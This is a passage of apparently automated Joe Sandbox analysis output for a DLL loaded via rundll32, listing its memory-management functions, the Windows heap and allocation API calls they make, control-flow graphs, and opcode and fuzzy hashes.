                                                                                                                      • Associated: 0000000B.00000002.514940007.0000000010057000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.514981615.000000001005A000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: AllocateHeap_malloc
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 501242067-0
                                                                                                                      • Opcode ID: ab67eba576b62ed2242e6049fa4a9f00a0283ae289beaf397465af8560d1c9fc
                                                                                                                      • Instruction ID: 7622b3071c216813c8acba396ad13572c3e9674cac4916c3917d4934f1ce5c91
                                                                                                                      • Opcode Fuzzy Hash: ab67eba576b62ed2242e6049fa4a9f00a0283ae289beaf397465af8560d1c9fc
                                                                                                                      • Instruction Fuzzy Hash: BF844072D0002ECFCF08DFECCA959EEFBB5FF68204B169259D425BB294C6356A11CA54
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 1002083B Relevance: 16.6, APIs: 11, Instructions: 103memoryCOMMONLIBRARYCODE
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                      • EnterCriticalSection.KERNEL32(100575E0,?,?,?,?,100575C4,10020C7A,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004), ref: 1002084A
                                                                                                                      • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,100575C4,10020C7A,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139), ref: 100208A0
                                                                                                                      • GlobalHandle.KERNEL32(002A7A60), ref: 100208A9
                                                                                                                      • GlobalUnlock.KERNEL32(00000000,?,?,?,?,100575C4,10020C7A,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004), ref: 100208B2
                                                                                                                      • GlobalReAlloc.KERNEL32(00000000,00000000,00002002), ref: 100208C9
                                                                                                                      • GlobalHandle.KERNEL32(002A7A60), ref: 100208DB
                                                                                                                      • GlobalLock.KERNEL32 ref: 100208E2
                                                                                                                      • LeaveCriticalSection.KERNEL32(?,?,?,?,?,100575C4,10020C7A,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004), ref: 100208EC
                                                                                                                      • GlobalLock.KERNEL32 ref: 100208F8
                                                                                                                      • _memset.LIBCMT ref: 10020911
                                                                                                                      • LeaveCriticalSection.KERNEL32(?), ref: 1002093D
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.514808197.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.514799186.0000000010000000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.514890830.0000000010046000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.514913240.0000000010053000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.514940007.0000000010057000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.514981615.000000001005A000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Global$CriticalSection$AllocHandleLeaveLock$EnterUnlock_memset
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 496899490-0
                                                                                                                      • Opcode ID: 23a5f943a2514d5899e1dc1f035ea6f74369b98ac7016ed06c6f01df95d95d17
                                                                                                                      • Instruction ID: dc14c853345dee55639cdae2a1fd03b11c2696e398e705256622f09b1856cd91
                                                                                                                      • Opcode Fuzzy Hash: 23a5f943a2514d5899e1dc1f035ea6f74369b98ac7016ed06c6f01df95d95d17
                                                                                                                      • Instruction Fuzzy Hash: 08319C75600715AFE324CF24DD88A1AB7EAEB49241B01492AF996C3662EB71F8448B50
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 1002FA69 Relevance: 7.5, APIs: 5, Instructions: 44memoryCOMMONLIBRARYCODE
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                      • __lock.LIBCMT ref: 1002FA87
                                                                                                                        • Part of subcall function 10035A99: __mtinitlocknum.LIBCMT ref: 10035AAD
                                                                                                                        • Part of subcall function 10035A99: __amsg_exit.LIBCMT ref: 10035AB9
                                                                                                                        • Part of subcall function 10035A99: EnterCriticalSection.KERNEL32(00000001,00000001,?,10035387,0000000D,10050C60,00000008,10035479,00000001,?,?,00000001,?,?,10030C69,00000001), ref: 10035AC1
                                                                                                                      • ___sbh_find_block.LIBCMT ref: 1002FA92
                                                                                                                      • ___sbh_free_block.LIBCMT ref: 1002FAA1
                                                                                                                      • HeapFree.KERNEL32(00000000,?,10050988), ref: 1002FAD1
                                                                                                                      • GetLastError.KERNEL32(?,1003580D,?,00000001,00000001,10035A23,00000018,10050CC8,0000000C,10035AB2,00000001,00000001,?,10035387,0000000D,10050C60), ref: 1002FAE2
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.514808197.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.514799186.0000000010000000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.514890830.0000000010046000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.514913240.0000000010053000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.514940007.0000000010057000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.514981615.000000001005A000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2714421763-0
                                                                                                                      • Opcode ID: dc462893557a6a2c1efb59ab9fc79b5cbceadcecec0e23dee2ff352f2dee75c2
                                                                                                                      • Instruction ID: c59143bfe651e608972d8f734a12067a167937505bca417355bd9d82aad263b9
                                                                                                                      • Opcode Fuzzy Hash: dc462893557a6a2c1efb59ab9fc79b5cbceadcecec0e23dee2ff352f2dee75c2
                                                                                                                      • Instruction Fuzzy Hash: 3D012BB5904316AEEB11DFB0EC05B9D7BB4EF013D2F50412DF008AE091DB35A840DB92
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 10036624 Relevance: 3.0, APIs: 2, Instructions: 28memoryCOMMONLIBRARYCODE
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 240 10036624-10036642 HeapCreate 241 10036647-10036654 call 100365c9 240->241 242 10036644-10036646 240->242 245 10036656-10036663 call 10035aca 241->245 246 1003667a-1003667d 241->246 245->246 249 10036665-10036678 HeapDestroy 245->249 249->242
                                                                                                                      APIs
                                                                                                                      • HeapCreate.KERNELBASE(00000000,00001000,00000000,10030AEB,00000001,?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C), ref: 10036635
                                                                                                                      • HeapDestroy.KERNEL32(?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C,10030D23,?), ref: 1003666B
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.514808197.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.514799186.0000000010000000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.514890830.0000000010046000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.514913240.0000000010053000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.514940007.0000000010057000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.514981615.000000001005A000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Heap$CreateDestroy
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3296620671-0
                                                                                                                      • Opcode ID: d3c419273cfe47b5decc93e2e70dd510a49122bb40b3ad2795d27682d43cbdf9
                                                                                                                      • Instruction ID: 5adf962be877c1470e25a5b203e63be93066c2f5666ac54c72bc9e0dfe65a95a
                                                                                                                      • Opcode Fuzzy Hash: d3c419273cfe47b5decc93e2e70dd510a49122bb40b3ad2795d27682d43cbdf9
                                                                                                                      • Instruction Fuzzy Hash: 22E06D706103519EFB139B30CE8A33539F8FB5878BF008869F405C80A0FBA08840AA15
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 100019C0 Relevance: 2.6, APIs: 2, Instructions: 115memoryCOMMONLIBRARYCODE
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 250 100019c0-100019ee 251 10001a02-10001a0e 250->251 252 10001a14-10001a1b 251->252 253 10001b06 251->253 255 10001a83-10001a9e call 10001990 252->255 256 10001a1d-10001a2a 252->256 254 10001b0b-10001b0e 253->254 265 10001aa0-10001aa2 255->265 266 10001aa4-10001ac9 VirtualAlloc 255->266 257 10001a2c-10001a4e VirtualAlloc 256->257 258 10001a7e 256->258 260 10001a50-10001a52 257->260 261 10001a57-10001a7b call 100017c0 257->261 258->251 260->254 261->258 265->254 268 10001acb-10001acd 266->268 269 10001acf-10001afe call 10001810 266->269 268->254 269->253
                                                                                                                      APIs
                                                                                                                      • VirtualAlloc.KERNEL32(4D8B0000,00000000,00001000,00000004,?,1000257F,00000000), ref: 10001A41
                                                                                                                      • VirtualAlloc.KERNELBASE(4D8B0000,8B118BBC,00001000,00000004,10012839,8B118BBC,?,1000257F,00000000,10012839,?), ref: 10001ABC
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.514808197.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.514799186.0000000010000000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.514890830.0000000010046000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.514913240.0000000010053000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.514940007.0000000010057000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.514981615.000000001005A000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: AllocVirtual
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4275171209-0
                                                                                                                      • Opcode ID: 095274eb58cefc7da223eb8c3e93af1acb0495bf3fbc764276b25f8f0a8074d8
                                                                                                                      • Instruction ID: bcee95509f27266f5ca249dd7f6d6a0ca5035efccc592cd1fda7edfbe35d51d4
                                                                                                                      • Opcode Fuzzy Hash: 095274eb58cefc7da223eb8c3e93af1acb0495bf3fbc764276b25f8f0a8074d8
                                                                                                                      • Instruction Fuzzy Hash: 0D51D9B4A0010AEFDB04CF94C991AAEB7F5FF48344F248599E905AB345D770EE91CBA1
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%